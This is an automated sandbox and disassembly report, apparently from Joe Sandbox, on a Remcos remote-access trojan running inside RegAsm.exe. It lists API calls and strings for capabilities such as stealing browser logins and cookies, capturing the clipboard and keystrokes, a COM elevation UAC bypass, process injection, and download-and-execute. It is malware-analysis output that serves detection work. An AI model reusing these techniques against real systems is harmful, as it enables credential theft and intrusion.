                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                  • API String ID: 3018269243-13974260
                                                  • Opcode ID: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                  • Opcode Fuzzy Hash: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                  • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004168FD
                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID: !D@
                                                  • API String ID: 3520204547-604454484
                                                  • Opcode ID: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                  • Opcode Fuzzy Hash: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                  • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                  • API String ID: 3756808967-1743721670
                                                  • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                  • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                  • API String ID: 0-1861860590
                                                  • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                  • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040755C
                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                  • Opcode Fuzzy Hash: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: JD$JD$JD
                                                  • API String ID: 745075371-3517165026
                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 1164774033-405221262
                                                  • Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                  • Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                  • API String ID: 341183262-3812160132
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                                  • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                  • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                  • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID:
                                                  • API String ID: 1888522110-0
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  APIs
                                                  • _free.LIBCMT ref: 00449292
                                                  • _free.LIBCMT ref: 004492B6
                                                  • _free.LIBCMT ref: 0044943D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 00449609
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  APIs
                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-2876530381
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                  Strings
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                  • UserProfile, xrefs: 0040BA59
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  Similarity
                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                  • String ID:
                                                  • API String ID: 1824512719-0
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                  Similarity
                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                  • String ID:
                                                  • API String ID: 1771804793-0
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                  • API String ID: 2825088817-3056885514
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: XPG$XPG
                                                  • API String ID: 4113138495-1962359302
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: p'E$JD
                                                  • API String ID: 1084509184-908320845
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
